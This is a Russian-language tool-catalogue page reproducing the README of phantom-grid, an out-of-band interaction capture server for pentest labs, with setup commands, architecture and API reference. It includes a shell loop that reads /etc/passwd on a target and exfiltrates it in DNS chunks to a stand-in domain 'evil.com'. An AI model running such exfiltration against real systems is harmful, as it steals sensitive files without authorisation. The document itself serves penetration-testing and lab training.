Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
phantom-grid — Бесплатная альтернатива Burp Collaborator — захват OOB-взаимодействий (HTTP/HTTPS/DNS) с SQLite и восстановлением эксфильтрации | Kitploit
Инструменты/GitHubGitHub/evkir/phantom-grid
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатация веб-приложенийЭксфильтрация данныхСбор информацииВеб-безопасностьТестирование на ПроникновениеУтилиты и фреймворкиRed TeamingАнализ DNS
GitHub
1121 месяц назадЕщё не проверено
evkir/phantom-grid

phantom-grid

Бесплатная альтернатива Burp Collaborator — захват OOB-взаимодействий (HTTP/HTTPS/DNS) с SQLite и восстановлением эксфильтрации

РепозиторийСайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Phantom Grid

⬡ Phantom Grid

Бесплатная open-source альтернатива Burp Collaborator для лабораторий пентеста
Перехват Out-of-Band (OOB) взаимодействий · HTTP/HTTPS · DNS · SQLite · Сборка эксфильтрации


Что это?

Phantom Grid — это self-hosted инструмент перехвата OOB (Out-of-Band) взаимодействий — бесплатная альтернатива Burp Collaborator для решения лабораторий пентеста (PortSwigger Web Security Academy, HackTheBox, TryHackMe и т.д.).

Возможности v2.0

ВозможностьОписание
Перехват HTTP + HTTPSДвойной стек с авто-генерацией самоподписанных TLS-сертификатов
Перехват DNSВстроенный DNS-сервер на порту 53
Сборка DNS-эксфильтрацииАвтоматическая сборка чанков из многочастной DNS-эксфильтрации
Хранение в SQLiteВсе данные сохраняются после перезапуска сервера (режим WAL для производительности)
40+ шаблонов payload'овSSRF, XXE, SQLi OOB, CMDi, SSTI, DNS-эксфильтрация — готовы к копированию
Тактический дашбордUI командного центра с мониторингом в реальном времени
Готов к DockerРазвёртывание одной командой
REST APIПолный API управления токенами/взаимодействиями/эксфильтрацией

Быстрый старт

Вариант 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

Вариант 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

Вариант 3: ngrok (для лабораторий без VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

Архитектура

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

Поддержка HTTPS

Современные приложения часто блокируют запросы со смешанным содержимым (http:// со страниц https://). Phantom Grid v2.0 работает по HTTPS наряду с HTTP.

Авто-генерация самоподписанного сертификата

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

Пользовательский сертификат (Let's Encrypt и т.д.)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

С ngrok (мгновенный публичный HTTPS)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

Сборка DNS-эксфильтрации

Phantom Grid автоматически собирает данные чанковой DNS-эксфильтрации. Это критически важно для извлечения больших payload'ов, которые необходимо разбить на несколько DNS-запросов (метки ограничены 63 байтами).

Поддерживаемые форматы

ФорматПримерСценарий использования
Простойdata.TOKEN.domainЭксфильтрация одного значения
Индексированный0.chunk1.TOKEN.domainАвто-сессия, упорядоченные чанки
С тегомsess1.0.chunk1.TOKEN.domainИменованная сессия с упорядочиванием
Сигнал завершенияend.sess1.TOKEN.domainОтметить сессию завершённой

Пример: Эксфильтрация /etc/passwd через DNS

На цели:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

Просмотр собранных данных:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

Ответ:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

Хранение в SQLite

Все данные хранятся в phantom_grid.db с использованием режима SQLite WAL для производительности параллельного чтения/записи.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

Данные сохраняются после перезапуска сервера. Резервное копирование — копированием phantom_grid.db.


Справочник API

Токены

МетодEndpointОписание
GET/api/tokensСписок всех токенов со статистикой
POST/api/tokensСоздать токен {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>Обновить метку/заметки токена
DELETE/api/tokens/<id>Удалить токен + все данные (CASCADE)

Взаимодействия

МетодEndpointОписание
GET/api/tokens/<id>/interactions?limit=&offset=Получить взаимодействия токена
DELETE/api/tokens/<id>/interactionsОчистить взаимодействия
GET/api/log?limit=Глобальный лог (все токены)
GET/api/poll?since=<ISO>Опрос новых взаимодействий

DNS-эксфильтрация

МетодEndpointОписание
GET/api/tokens/<id>/exfilПолучить сессии эксфильтрации с собранными данными

Система

МетодEndpointОписание
GET/api/statsГлобальная статистика (счётчики, размер БД)
GET/healthПроверка работоспособности

Endpoint'ы перехвата

Скачать инструмент